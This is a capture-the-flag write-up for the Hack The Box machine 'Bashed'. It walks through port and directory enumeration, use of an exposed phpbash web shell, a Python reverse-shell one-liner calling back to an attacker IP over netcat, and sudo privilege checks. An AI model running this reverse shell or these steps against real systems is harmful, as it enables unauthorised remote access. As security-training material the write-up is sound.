👽Bashed Writeup

[File Misconfiguration] [Web]

Nmap

• -sC: Performs a script scan using the default set of scripts

• -sV: Probe open ports to determine service/version info

• -O: Enable OS detection

• -oA: Output in the three major formats at once

┌──(kali㉿kali)-[~/HTB/bashed]
└─$ sudo nmap -sC -sV -O -oA nmap_bashed 10.10.10.68                                                                                                                    1 ⨯
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 07:18 EST
Nmap scan report for 10.10.10.68
Host is up (0.015s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/10%OT=80%CT=1%CU=39439%PV=Y%DS=2%DC=I%G=Y%TM=61DC240
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11
OS:NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.33 seconds

Visiting the URL http://10.10.10.68/ will bring us to the following web page.

Gobuster

• dir: Uses directory/file enumeration mode

• -w: Path to the wordlist

• -u: The target URL

• -f: Append / to each request

• -x: File extension(s) to search for

┌──(kali㉿kali)-[~/HTB/bashed]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.68 -f -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2022/01/10 07:36:26 Starting gobuster in directory enumeration mode
===============================================================
/images/              (Status: 200) [Size: 1564]
/index.html           (Status: 200) [Size: 7743]
/contact.html         (Status: 200) [Size: 7805]
/about.html           (Status: 200) [Size: 8193]
/icons/               (Status: 403) [Size: 292] 
/uploads/             (Status: 200) [Size: 14]  
/php/                 (Status: 200) [Size: 939] 
/css/                 (Status: 200) [Size: 1758]
/dev/                 (Status: 200) [Size: 1148]
/js/                  (Status: 200) [Size: 3165]
/config.php           (Status: 200) [Size: 0]   
/fonts/               (Status: 200) [Size: 2095]
/single.html          (Status: 200) [Size: 7477]
/scroll.html          (Status: 200) [Size: 10863]
                                                 
===============================================================
2022/01/10 07:40:39 Finished
===============================================================

Visiting the URL http://10.10.10.68/dev/ will bring us to a directory with the following files:

Dirbuster

Fuzzing for the extension sh, py, pl using Dirbuster.

┌──(kali㉿kali)-[~/HTB/shocker]
└─$ dirbuster                                                               
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1

Input the following fields into the Dirbuster's GUI:

• Target URL

• File with list of dirs/files

• File extension

Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /images/ - 200
File found: /index.html - 200
Dir found: /icons/ - 403
File found: /single.html - 200
Dir found: /js/ - 200
File found: /js/jquery.js - 200
File found: /js/imagesloaded.pkgd.js - 200
File found: /js/jquery.nicescroll.min.js - 200
File found: /js/jquery.smartmenus.min.js - 200
Dir found: /demo-images/ - 200
File found: /js/jquery.carouFredSel-6.0.0-packed.js - 200
File found: /js/jquery.mousewheel.min.js - 200
File found: /js/jquery.touchSwipe.min.js - 200
File found: /js/jquery.easing.1.3.js - 200
File found: /js/custom_google_map_style.js - 200
File found: /js/main.js - 200
File found: /js/html5.js - 200
Dir found: /uploads/ - 200
Dir found: /php/ - 200
File found: /php/sendMail.php - 200
Dir found: /css/ - 200
File found: /css/carouFredSel.css - 200
File found: /css/clear.css - 200
File found: /css/common.css - 200
File found: /css/font-awesome.min.css - 200
File found: /css/sm-clean.css - 200
Dir found: /icons/small/ - 403
Dir found: /dev/ - 200
File found: /dev/phpbash.min.php - 200
File found: /dev/phpbash.php - 200
File found: /config.php - 200

Visiting the URL http://10.10.10.68/dev/phpbash.php seems to execute a shell session.

We can execute the following commands to test it:

• echo $0: Check the name of the running process. In this case, it is 'sh'.

• whoami: Display the username of the current user.

• sudo -l: list user's privileges or check a specific command.

Since I know the flag for the user is in the file 'user.txt', I executed the following command to find it:

find / -type f -name *.txt | grep user

Netcat

Execute 'nc -lvnp 5566' to create a listener on another terminal.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5566
listening on [any] 5566 ...

Reverse Shell

Test if the system has Python installed

• which python

We are able to get the Python reverse shell code from https://pentestmonkey.net

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.17.239",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Netcat

Head back to the the terminal where we executed the Netcat listener code.

┌──(kali㉿kali)-[~/HTB/bashed]
└─$ nc -lvnp 5566                                                                                                                                                       1 ⨯
listening on [any] 5566 ...
connect to [10.10.17.239] from (UNKNOWN) [10.10.10.68] 46604
/bin/sh: 0: can't access tty; job control turned off                                                                                                                        
$ whoami                                                                                                                                                                    
www-data                                                                                                                                                                    
$ 

Sudo

sudo -l: list user's privileges or check a specific command

$ sudo -l                                                                                                                                                                   
Matching Defaults entries for www-data on bashed:                                                                                                                           
    env_reset, mail_badpass,                                                                                                                                                
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                                                                                
                                                                                                                                                                            
User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
$